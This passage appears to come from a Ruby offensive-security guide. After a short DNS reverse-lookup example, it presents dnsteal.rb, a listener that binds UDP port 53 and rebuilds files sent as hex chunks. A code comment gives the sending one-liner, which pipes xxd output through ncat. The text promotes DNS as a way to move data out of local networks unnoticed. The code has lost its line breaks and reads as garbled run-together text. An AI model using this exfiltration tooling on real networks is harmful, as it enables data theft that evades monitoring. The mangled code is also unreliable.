Returns array of all hostnames, if PTR is assigned
["ec2-174-129-41-187.compute-1.amazonaws.com"]
or use Resolv.name to get one name only
DNS Data Exfiltration
DNS out-band connection is usually allowed in local networks, which is the major benefits of using DNS to transfer data to external server.
dnsteal.rb
#!/usr/bin/env ruby# KING SABRI | @KINGSABRI# for hex in $(xxd -p ethernet-cable.jpg); do echo $hex | ncat -u localhost 53 ; done# require'socket'ifARGV.size <1puts"[+] sudo ruby #{__FILE__} <FILENAME>"exitelse file =ARGV[0]end# Open UDP Socket and bind it to port 53 on all interfacesudpsoc =UDPSocket.newudpsoc.bind('0.0.0.0',53)begin data ='' data_old =''loopdo response = udpsoc.recvfrom(1000) response = response[0].force_encoding("ISO-8859-1").encode("utf-8") data = response.match(/[^<][a-f0-9]([a-f0-9]).*[a-f0-9]([a-f0-9])/i).to_s# Write received data to fileFile.open(file,'a') do|d| d.write [data].pack("H*") unless data == data_old # Don't write the same data twice(poor workaround)puts data unless data == data_oldend data_old = data endrescueException=> eputs eend